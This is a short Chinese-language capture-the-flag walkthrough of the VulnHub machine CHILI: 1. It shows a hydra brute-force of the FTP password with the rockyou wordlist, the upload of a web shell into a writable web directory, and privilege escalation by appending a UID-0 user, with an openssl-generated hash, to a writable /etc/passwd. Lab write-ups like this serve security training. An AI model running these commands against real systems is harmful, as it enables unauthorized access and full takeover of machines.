VulnHub靶场之CHILI: 1
扫描IP以及端口:
访问80端口,一个小辣椒,目录扫描,啥都没有,只能从ftp下手了:
看了看hint,用chili当作用户名试试破解一下密码:
利用hydra破解ftp密码:
hydra -l chili -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.198.150
得到密码:
成功进入:
进入到/var/www/html下,.nano下可读可写:
上传shell文件,别忘了加权限chmod 777:
访问,监听:
就一个用户chili,,,内核也较新:
发现passwd可以写入:
直接利用kali的工具openssl:
openssl passwd -1 -salt shell 123
写入到passwd:
echo 'shell:$1$shell$5TvJA7y/9faSDWR84IKgZ/:0:0::/root:/bin/bash'>>/etc/passwd
成功获取root权限,读取flag: